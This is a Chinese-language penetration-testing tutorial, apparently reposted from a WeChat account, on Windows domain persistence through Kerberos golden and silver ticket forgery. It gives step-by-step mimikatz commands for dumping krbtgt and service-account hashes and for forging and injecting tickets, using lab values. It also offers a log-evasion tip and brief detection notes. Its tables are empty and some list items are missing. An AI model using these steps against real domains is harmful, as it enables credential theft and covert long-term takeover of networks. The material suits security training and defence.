环境:
- 域 控:Windows Server 2022(DC2022)
- 域用户:Windows Server 2022(CN-2022-DU)
黄金票据(Golden Tiket)
黄金票据是一种在 Kerberos 协议攻击中伪造的票据授予票据(Ticket Granting Ticket,TGT),用于在域渗透中实现权限维持。通过伪造 TGT,渗透人员可以绕过 Kerberos 认证的身份验证环节,长期控制域内资源。
原理
Kerberos 认证过程中,客户端(Client)通过身份认证服务(AS)获取 TGT,该票据由 krbtgt 账户的 NTLM Hash 加密。由于 krbtgt 的 Hash 值固定且 TGT 的会话密钥(LogonSessionKey)不会保存在 KDC(密钥分发中心)中,渗透人员一旦获取 krbtgt 账户的 NTLM Hash,即可伪造合法的 TGT。
TGT 可直接用于与票据授予服务(TGS)交互,无需验证用户密码,即使域管理员修改了密码,渗透人员仍然可以维持权限。
Kerberos TGT
krbtgt(Kerberos TGT)用户是域自带的用户,被密钥分发中心(KDC)所使用,属于 Domain Users 组。在域环境中,每个用户账号的票据都是由 krbtgt 用户生成的。
如果知道了 krbtgt 用户的 NTLM 哈希,就可以伪造域内任意用户的身份。
生成黄金票据的条件
3、其他信息:模拟的任意用户账户名称。
攻击流程
privilege::debug
lsadump::lsa /inject /name:krbtgt
kerberos::golden /user:伪造的用户名 /domain:域名 /sid:域的 SID 值 /krbtgt:krbtgt 账户的 NTLM Hash /id:500
ID:500 表示伪造的黄金票据将关联到域管理员账户(RID 500)。
kerberos::ptt ticket.kirbi
misc::cmd
dir \域控C$
黄金票据特点
• 通过 "票据传递"(Pass The Ticket,PTT)可访问域内所有服务资源。• 票据有效期可自定义,且不受密码策略影响。• 可伪造任意用户身份(如域管理员)。• 无需与 KDC 频繁交互,仅需一次 TGT 伪造即可长期使用。
防御与检测
• 检查事件 ID 4769(TGS 请求)是否伴随合法 TGT(事件 ID 4768),异常情况可能为黄金票据攻击。• 监控对域控共享资源(如 C$)的异常访问(事件 ID 5140)。
白银票据(Silver Tiket)
白银票据是 Kerberos 协议攻击中一种伪造服务票据(Service Ticket,ST)手段,主要用于在已攻陷的域环境中实现隐蔽的权限维持。与使用黄金票据冒充用户相比,白银票据允许渗透人员冒充网络上的服务和计算机。
针对主机上的服务进行攻击时,先识别具有已注册服务主体名称(SPN)的服务账户,并识别 SPN 类型,类型可能是 CIFS、MSSQL、HOST、HTTP 等。可以使用 Impacket GetUserSPNs.py 脚本来检索具有 SPN 的账户。
原理
通过直接伪造 Kerberos 认证流程中的服务票据(ST),绕过 KDC(密钥分发中心)的验证。渗透人员利用服务账户(如计算机账户)的 NTLM 哈希生成 ST,使渗透人员无需与域控制器交互即可访问特定服务。
局限性
白银票据仅对特定服务有效(如 CIFS 文件共享、LDAP 目录服务等),无法像黄金票据(伪造 TGT)一样访问域内所有资源。
生成白银票据的条件
1、域基本信息:域名、域的 SID 值。2、关键凭证:服务账户的 NTLM Hash。3、其他信息:服务所在主机名、服务类型、模拟的任意用户账户名称。
攻击流程
1、提升权限(在域控制器操作)。
privilege::debug
2、检索域的 SID 值以及具有注册 SPN 的服务账户或计算机账户的 NTML 哈希(在域控制器操作)。
lsadump::lsa /patch
3、生成白银票据,并将票据直接注入内存(在普通域用户操作)。
kerberos::golden /domain:hack.com /sid:S-1-5-21-1783398585-996730644-213359695 /service:cifs /target:DC2022 /rc4:b9a04ee56b48ed1c9eddc865f8b5fe1f /user:silver /ptt
4、通过 mimikatz 打开新会话(在普通域用户操作)。
misc::cmd
5、通过共享访问验证是否生效(在普通域用户操作)。
dir \DC2022C$
不同服务的白银票据生成示例
|
|
|
---|---|---|
|
|
|
|
|
|
|
|
|
注意事项
• 服务类型限制:白银票据仅对指定服务有效(如 CIFS、LDAP 等),无法像黄金票据一样访问所有服务。
• 票据有效期:默认有效期为 10 小时(与 Kerberos 策略一致),手动延长(添加 /endin:600 参数设置 600 分钟)。
• 防御规避:避免在日志中留下异常记录(如事件 ID 4769 中加密类型为 RC4),可使用 AES 加密的哈希(需替换 /rc4 为 /aes256,但需要获取 AES 密钥)。
防御措施
黄金票据与白银票据的区别
|
|
|
---|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
原文始发于微信公众号(走在网安路上的哥布林):Windows 权限维持 · 黄金、白银票据
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论